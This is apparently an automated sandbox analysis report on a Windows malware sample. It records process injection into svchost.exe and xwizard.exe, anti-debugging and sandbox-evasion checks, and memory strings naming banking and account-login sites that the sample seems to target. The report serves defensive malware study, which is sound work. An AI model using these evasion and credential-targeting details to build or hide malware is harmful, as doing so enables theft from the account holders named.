Source: 6SN0DJ38zZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 6SN0DJ38zZ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gmbrlAYBeQOw.exe, 0000000A.00000000.1612130154.000000000073E000.00000002.00000001.01000000.00000005.sdmp, gmbrlAYBeQOw.exe, 0000000C.00000000.1762645537.000000000073E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: 6SN0DJ38zZ.exe, 00000000.00000003.1283812999.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, 6SN0DJ38zZ.exe, 00000000.00000003.1286063878.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1596141207.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1691164120.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1593992766.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1691164120.0000000003400000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000003.1692154968.0000000004B07000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000002.2012509338.0000000004FFE000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000002.2012509338.0000000004E60000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000003.1694117014.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 6SN0DJ38zZ.exe, 00000000.00000003.1283812999.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, 6SN0DJ38zZ.exe, 00000000.00000003.1286063878.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1596141207.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1691164120.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1593992766.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1691164120.0000000003400000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000003.1692154968.0000000004B07000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000002.2012509338.0000000004FFE000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000002.2012509338.0000000004E60000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000003.1694117014.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: xwizard.pdb source: svchost.exe, 00000007.00000002.1690923576.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1659707171.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000A.00000003.1631333327.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000A.00000002.3122529177.0000000000C58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: xwizard.exe, 0000000B.00000002.2012848356.000000000548C000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 0000000B.00000002.2011770256.0000000003266000.00000004.00000020.00020000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000C.00000002.3123382739.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.3120776782.000000000247C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: xwizard.exe, 0000000B.00000002.2012848356.000000000548C000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 0000000B.00000002.2011770256.0000000003266000.00000004.00000020.00020000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000C.00000002.3123382739.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.3120776782.000000000247C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: xwizard.pdbGCTL source: svchost.exe, 00000007.00000002.1690923576.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1659707171.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000A.00000003.1631333327.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000A.00000002.3122529177.0000000000C58000.00000004.00000020.00020000.00000000.sdmp

Source: 6SN0DJ38zZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 6SN0DJ38zZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 6SN0DJ38zZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 6SN0DJ38zZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 6SN0DJ38zZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_00984B37 LoadLibraryA,GetProcAddress,

0_2_00984B37

Source: 6SN0DJ38zZ.exe

Static PE information: real checksum: 0x12c1af should be: 0x12c1b0

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009A8945 push ecx; ret	0_2_009A8958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041425A pushfd ; ret	7_2_004142EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041596D pushfd ; ret	7_2_004159C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00413973 push ss; retf	7_2_00413A25
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004159C2 pushfd ; ret	7_2_004159C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004139CD push ss; retf	7_2_00413A25
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00414277 pushfd ; ret	7_2_004142EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00412279 pushad ; retf	7_2_0041227B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004082AC push es; ret	7_2_004082AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00403340 push eax; ret	7_2_00403342
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041554A pushfd ; ret	7_2_004156CE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041652A push esi; ret	7_2_0041652B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00415588 pushfd ; ret	7_2_004156CE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00415EC6 push cs; ret	7_2_00415EC7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00417723 push ds; retn 42ABh	7_2_004177B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040AF3A push ds; iretd	7_2_0040AF3E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034309AD push ecx; mov dword ptr [esp], ecx	7_2_034309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0340135E push eax; iretd	7_2_03401369
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_03428340 push esp; retf	10_2_03428346
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_0342CB5C push edx; retf	10_2_0342CB5D
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_0342CB97 push cs; iretd	10_2_0342CB9A
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_03423A15 push cs; ret	10_2_03423A16
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_03418A89 push ds; iretd	10_2_03418A8D
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_03424079 push esi; ret	10_2_0342407A
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_034230D7 pushfd ; ret	10_2_0342321D
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_03423099 pushfd ; ret	10_2_0342321D
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_03418512 push es; retn 2589h	10_2_0341868A
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_03423511 pushfd ; ret	10_2_03423517
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_0342152D push ss; retf	10_2_03421574
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_0341FDC8 pushad ; retf	10_2_0341FDCA
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_03415DFB push es; ret	10_2_03415DFC

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_009848D7
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_00A05376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00A05376

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009A3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_009A3187

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	API/Special instruction interceptor: Address: 13FDD04
Source: C:\Windows\SysWOW64\xwizard.exe	API/Special instruction interceptor: Address: 7FFB2CECD324

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0347096E rdtsc

7_2_0347096E

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-105698

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	API coverage: 4.5 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %

Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe TID: 1268

Thread sleep time: -115000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009E445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_009E445A
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009EC6D1 FindFirstFileW,FindClose,	0_2_009EC6D1
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009EC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_009EC75C
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009EEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009EEF95
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009EF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009EF0F2
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009EF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009EF3F3
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009E37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009E37EF
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009E3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009E3B12
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009EBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009EBCBC

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009849A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009849A0

Source: xwizard.exe, 0000000B.00000002.2014082459.000000000807B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rs - HKVMware20,11696492231]
Source: X0a-0531.11.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: X0a-0531.11.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: X0a-0531.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: X0a-0531.11.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: X0a-0531.11.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: xwizard.exe, 0000000B.00000002.2014082459.000000000807B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20
Source: xwizard.exe, 0000000B.00000002.2014082459.000000000807B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware2
Source: X0a-0531.11.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: X0a-0531.11.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: X0a-0531.11.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: X0a-0531.11.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: X0a-0531.11.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: X0a-0531.11.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: X0a-0531.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: X0a-0531.11.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: X0a-0531.11.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: xwizard.exe, 0000000B.00000002.2014082459.000000000807B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231
Source: X0a-0531.11.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: xwizard.exe, 0000000B.00000002.2014082459.000000000807B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,116
Source: X0a-0531.11.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: xwizard.exe, 0000000B.00000002.2014082459.000000000807B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware
Source: xwizard.exe, 0000000B.00000002.2011770256.0000000003266000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: X0a-0531.11.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: X0a-0531.11.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: X0a-0531.11.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: X0a-0531.11.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: xwizard.exe, 0000000B.00000002.2014082459.000000000807B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /profileVMware20,11696492231u
Source: xwizard.exe, 0000000B.00000002.2014082459.000000000807B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|
Source: X0a-0531.11.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: X0a-0531.11.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: X0a-0531.11.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: X0a-0531.11.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: X0a-0531.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: gmbrlAYBeQOw.exe, 0000000C.00000002.3122629982.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: X0a-0531.11.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: X0a-0531.11.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: X0a-0531.11.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: X0a-0531.11.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: X0a-0531.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: X0a-0531.11.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

API call chain: ExitProcess graph end node

graph_0-104358

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0347096E rdtsc

7_2_0347096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_004176A3 LdrLoadDll,

7_2_004176A3

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009F3F09 BlockInput,

0_2_009F3F09

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_00983B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00983B3A

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009B5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_009B5A7C

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_00984B37 LoadLibraryA,GetProcAddress,

0_2_00984B37

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_013FC8F0 mov eax, dword ptr fs:[00000030h]	0_2_013FC8F0
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_013FDF70 mov eax, dword ptr fs:[00000030h]	0_2_013FDF70
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_013FDFD0 mov eax, dword ptr fs:[00000030h]	0_2_013FDFD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]	7_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]	7_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]	7_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]	7_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]	7_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]	7_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]	7_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]	7_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]	7_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]	7_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]	7_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]	7_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]	7_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]	7_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]	7_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B035C mov eax, dword ptr fs:[00000030h]	7_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B035C mov eax, dword ptr fs:[00000030h]	7_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B035C mov eax, dword ptr fs:[00000030h]	7_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B035C mov ecx, dword ptr fs:[00000030h]	7_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B035C mov eax, dword ptr fs:[00000030h]	7_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B035C mov eax, dword ptr fs:[00000030h]	7_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FA352 mov eax, dword ptr fs:[00000030h]	7_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D8350 mov ecx, dword ptr fs:[00000030h]	7_2_034D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0350634F mov eax, dword ptr fs:[00000030h]	7_2_0350634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D437C mov eax, dword ptr fs:[00000030h]	7_2_034D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346A30B mov eax, dword ptr fs:[00000030h]	7_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346A30B mov eax, dword ptr fs:[00000030h]	7_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346A30B mov eax, dword ptr fs:[00000030h]	7_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342C310 mov ecx, dword ptr fs:[00000030h]	7_2_0342C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03450310 mov ecx, dword ptr fs:[00000030h]	7_2_03450310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03508324 mov eax, dword ptr fs:[00000030h]	7_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03508324 mov ecx, dword ptr fs:[00000030h]	7_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03508324 mov eax, dword ptr fs:[00000030h]	7_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03508324 mov eax, dword ptr fs:[00000030h]	7_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034EC3CD mov eax, dword ptr fs:[00000030h]	7_2_034EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034383C0 mov eax, dword ptr fs:[00000030h]	7_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034383C0 mov eax, dword ptr fs:[00000030h]	7_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034383C0 mov eax, dword ptr fs:[00000030h]	7_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034383C0 mov eax, dword ptr fs:[00000030h]	7_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B63C0 mov eax, dword ptr fs:[00000030h]	7_2_034B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DE3DB mov eax, dword ptr fs:[00000030h]	7_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DE3DB mov eax, dword ptr fs:[00000030h]	7_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DE3DB mov ecx, dword ptr fs:[00000030h]	7_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DE3DB mov eax, dword ptr fs:[00000030h]	7_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D43D4 mov eax, dword ptr fs:[00000030h]	7_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D43D4 mov eax, dword ptr fs:[00000030h]	7_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]	7_2_034403E9
